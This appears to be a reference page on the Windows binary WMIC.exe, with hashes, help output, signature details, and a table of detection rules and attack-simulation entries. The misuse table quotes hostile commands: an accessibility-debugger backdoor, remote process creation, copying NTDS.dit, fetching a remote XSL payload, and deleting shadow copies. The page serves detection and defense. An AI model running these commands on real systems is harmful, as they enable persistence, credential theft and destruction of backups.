WMIC.exe

  • File Path: C:\WINDOWS\system32\wbem\WMIC.exe
  • Description: WMI Commandline Utility

Hashes

Type Hash
MD5 B524D1706D895A504B192F864D50AEC3
SHA1 264640D9AD805A0DB59DF31F5CCCB64C7EEA4071
SHA256 9CA09A4366F3EF2006BE964CB0DE037219A311A2D49AAFAFA2C5BDC736DCE1BE
SHA384 F9E25DDC26896A2CB7D225158425E770EB7E6477DFB4D757ACD8D1DAF33D01E68A0492DD5C30D3A074A2C2651E134A19
SHA512 BFC5FF3051B2DCD9DC94AAB691E8078D76BCADC4238E503CC66F2158164DEA7AAE0BF505C14F7A048C8CB21FF1B257CD2354587EDB58A6A1E695A03DF0315DA0
SSDEEP 6144:lvx6yRHcf1/L8UxUkorp/jvKwfqGS8AUrXwHrsVP2d5ITGH5enh:Bx6yaJ84WxJJAeAHrsVuYTGH0nh
IMP 5268CCA80CACD62FE845F6ADABDFC03A
PESHA1 5D4B3382BBF803840F3D8F5961177D730408CF60
PE256 85B27582E008F4780D821687ED16F86CFA2E3DD38A29A0BB2B2FA7D1C0B0113A

Runtime Data

Usage (stdout):


WMIC is deprecated.

[global switches] <command>

The following global switches are available:
/NAMESPACE           Path for the namespace the alias operate against.
/ROLE                Path for the role containing the alias definitions.
/NODE                Servers the alias will operate against.
/IMPLEVEL            Client impersonation level.
/AUTHLEVEL           Client authentication level.
/LOCALE              Language id the client should use.
/PRIVILEGES          Enable or disable all privileges.
/TRACE               Outputs debugging information to stderr.
/RECORD              Logs all input commands and output.
/INTERACTIVE         Sets or resets the interactive mode.
/FAILFAST            Sets or resets the FailFast mode.
/USER                User to be used during the session.
/PASSWORD            Password to be used for session login.
/OUTPUT              Specifies the mode for output redirection.
/APPEND              Specifies the mode for output redirection.
/AGGREGATE           Sets or resets aggregate mode.
/AUTHORITY           Specifies the <authority type> for the connection.
/?[:<BRIEF|FULL>]    Usage information.

For more information on a specific global switch, type: switch-name /?


The following alias/es are available in the current role:
ALIAS                    - Access to the aliases available on the local system
BASEBOARD                - Base board (also known as a motherboard or system board) management.
BIOS                     - Basic input/output services (BIOS) management.
BOOTCONFIG               - Boot configuration management.
CDROM                    - CD-ROM management.
COMPUTERSYSTEM           - Computer system management.
CPU                      - CPU management.
CSPRODUCT                - Computer system product information from SMBIOS. 
DATAFILE                 - DataFile Management.  
DCOMAPP                  - DCOM Application management.
DESKTOP                  - User's Desktop management.
DESKTOPMONITOR           - Desktop Monitor management.
DEVICEMEMORYADDRESS      - Device memory addresses management.
DISKDRIVE                - Physical disk drive management. 
DISKQUOTA                - Disk space usage for NTFS volumes.
DMACHANNEL               - Direct memory access (DMA) channel management.
ENVIRONMENT              - System environment settings management.
FSDIR                    - Filesystem directory entry management. 
GROUP                    - Group account management. 
IDECONTROLLER            - IDE Controller management.  
IRQ                      - Interrupt request line (IRQ) management. 
JOB                      - Provides  access to the jobs scheduled using the schedule service. 
LOADORDER                - Management of system services that define execution dependencies. 
LOGICALDISK              - Local storage device management.
LOGON                    - LOGON Sessions.  
MEMCACHE                 - Cache memory management.
MEMORYCHIP               - Memory chip information.
MEMPHYSICAL              - Computer system's physical memory management. 
NETCLIENT                - Network Client management.
NETLOGIN                 - Network login information (of a particular user) management. 
NETPROTOCOL              - Protocols (and their network characteristics) management.
NETUSE                   - Active network connection management.
NIC                      - Network Interface Controller (NIC) management.
NICCONFIG                - Network adapter management. 
NTDOMAIN                 - NT Domain management.  
NTEVENT                  - Entries in the NT Event Log.  
NTEVENTLOG               - NT eventlog file management. 
ONBOARDDEVICE            - Management of common adapter devices built into the motherboard (system board).
OS                       - Installed Operating System/s management. 
PAGEFILE                 - Virtual memory file swapping management. 
PAGEFILESET              - Page file settings management. 
PARTITION                - Management of partitioned areas of a physical disk.
PORT                     - I/O port management.
PORTCONNECTOR            - Physical connection ports management.
PRINTER                  - Printer device management. 
PRINTERCONFIG            - Printer device configuration management.  
PRINTJOB                 - Print job management. 
PROCESS                  - Process management. 
PRODUCT                  - Installation package task management. 
QFE                      - Quick Fix Engineering.  
QUOTASETTING             - Setting information for disk quotas on a volume. 
RDACCOUNT                - Remote Desktop connection permission management.
RDNIC                    - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS            - Permissions to a specific Remote Desktop connection.
RDTOGGLE                 - Turning Remote Desktop listener on or off remotely.
RECOVEROS                - Information that will be gathered from memory when the operating system fails. 
REGISTRY                 - Computer system registry management.
SCSICONTROLLER           - SCSI Controller management.  
SERVER                   - Server information management. 
SERVICE                  - Service application management. 
SHADOWCOPY               - Shadow copy management.
SHADOWSTORAGE            - Shadow copy storage area management.
SHARE                    - Shared resource management. 
SOFTWAREELEMENT          - Management of the  elements of a software product installed on a system.
SOFTWAREFEATURE          - Management of software product subsets of SoftwareElement. 
SOUNDDEV                 - Sound Device management.
STARTUP                  - Management of commands that run automatically when users log onto the computer system.
SYSACCOUNT               - System account management.  
SYSDRIVER                - Management of the system driver for a base service.
SYSTEMENCLOSURE          - Physical system enclosure management.
SYSTEMSLOT               - Management of physical connection points including ports,  slots and peripherals, and proprietary connections points.
TAPEDRIVE                - Tape drive management.  
TEMPERATURE              - Data management of a temperature sensor (electronic thermometer).
TIMEZONE                 - Time zone data management. 
UPS                      - Uninterruptible power supply (UPS) management. 
USERACCOUNT              - User account management.
VOLTAGE                  - Voltage sensor (electronic voltmeter) data management.
VOLUME                   - Local storage volume management.
VOLUMEQUOTASETTING       - Associates the disk quota setting with a specific disk volume. 
VOLUMEUSERQUOTA          - Per user storage volume quota management.
WMISET                   - WMI service operational parameters management. 

For more information on a specific alias, type: alias /?

CLASS     - Escapes to full WMI schema.
PATH      - Escapes to full WMI object paths.
CONTEXT   - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.

For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?


Usage (stderr):

help - Alias not found.

Loaded Modules:

Path
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\wbem\WMIC.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: wmic.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/9ca09a4366f3ef2006be964cb0de037219a311a2d49aafafa2c5bdc736dce1be/detection

Possible Misuse

The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\wmic.exe' DRL 1.0
sigma win_susp_logon_explicit_credentials.yml - '\wmic.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\wmic.exe' DRL 1.0
sigma sysmon_suspicious_dbghelp_dbgcore_load.yml - '\wmic.exe' DRL 1.0
sigma sysmon_wmic_remote_xsl_scripting_dlls.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma process_creation_mal_blue_mockingbird.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma process_creation_office_applications_spawning_wmi_commandline.yml - Image: '\wbem\WMIC.exe' DRL 1.0
sigma process_creation_office_applications_spawning_wmi_commandline.yml - OriginalFileName: 'wmic.exe' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload.yml - OriginalFileName: 'wmic.exe' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload2.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma process_creation_office_spawning_wmi_commandline.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma process_creation_susp_recon.yml - '\WMIC.exe' DRL 1.0
sigma win_bypass_squiblytwo.yml - '\wmic.exe' DRL 1.0
sigma win_crime_maze_ransomware.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_html_help_spawn.yml - '\wmic.exe' DRL 1.0
sigma win_local_system_owner_account_discovery.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_office_shell.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma win_renamed_binary.yml - 'wmic.exe' DRL 1.0
sigma win_renamed_binary.yml - '\wmic.exe' DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - "wmic.exe" DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - '\wmic.exe' DRL 1.0
sigma win_shadow_copies_creation.yml - '\wmic.exe' DRL 1.0
sigma win_shadow_copies_deletion.yml - '\wmic.exe' DRL 1.0
sigma win_susp_eventlog_clear.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_susp_servu_process_pattern.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma win_susp_spoolsv_child_processes.yml - \wmic.exe DRL 1.0
sigma win_susp_wmi_execution.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_webshell_detection.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_xsl_script_processing.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_xsl_script_processing.yml - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. DRL 1.0
LOLBAS Wmic.yml Name: Wmic.exe  
LOLBAS Wmic.yml - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"  
LOLBAS Wmic.yml - Command: wmic.exe process call create calc  
LOLBAS Wmic.yml - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"  
LOLBAS Wmic.yml - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"  
LOLBAS Wmic.yml - Path: C:\Windows\System32\wbem\wmic.exe  
LOLBAS Wmic.yml - Path: C:\Windows\SysWOW64\wbem\wmic.exe  
atomic-red-team T1047.md This test uses wmic.exe to execute a process on the local host. MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1069.001.md Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. MIT License. © 2018 Red Canary
atomic-red-team T1069.001.md wmic.exe group get name MIT License. © 2018 Red Canary
atomic-red-team T1220.md | wmic_command | WMI command to execute using wmic.exe | String | process list| MIT License. © 2018 Red Canary
atomic-red-team T1490.md wmic.exe shadowcopy delete MIT License. © 2018 Red Canary
atomic-red-team T1518.001.md wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


wmic

Displays WMI information inside an interactive command shell.

Syntax

wmic </parameter>

Sub-commands

The following sub-commands are available at all times:

Sub-command Description
class Escapes from the default alias mode of WMIC to access classes in the WMI schema directly.
path Escapes from the default alias mode of WMIC to access instances in the WMI schema directly.
context Displays the current values of all global switches.
[quit | exit] Exits the WMIC command shell.

Examples

To display the current values of all global switches, type:

wmic context

Output similar to the following displays:

NAMESPACE    : root\cimv2
ROLE         : root\cli
NODE(S)      : BOBENTERPRISE
IMPLEVEL     : IMPERSONATE
[AUTHORITY   : N/A]
AUTHLEVEL    : PKTPRIVACY
LOCALE       : ms_409
PRIVILEGES   : ENABLE
TRACE        : OFF
RECORD       : N/A
INTERACTIVE  : OFF
FAILFAST     : OFF
OUTPUT       : STDOUT
APPEND       : STDOUT
USER         : N/A
AGGREGATE    : ON

To change the language ID used by the command line to English (locale ID 409), type:

wmic /locale:ms_409

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.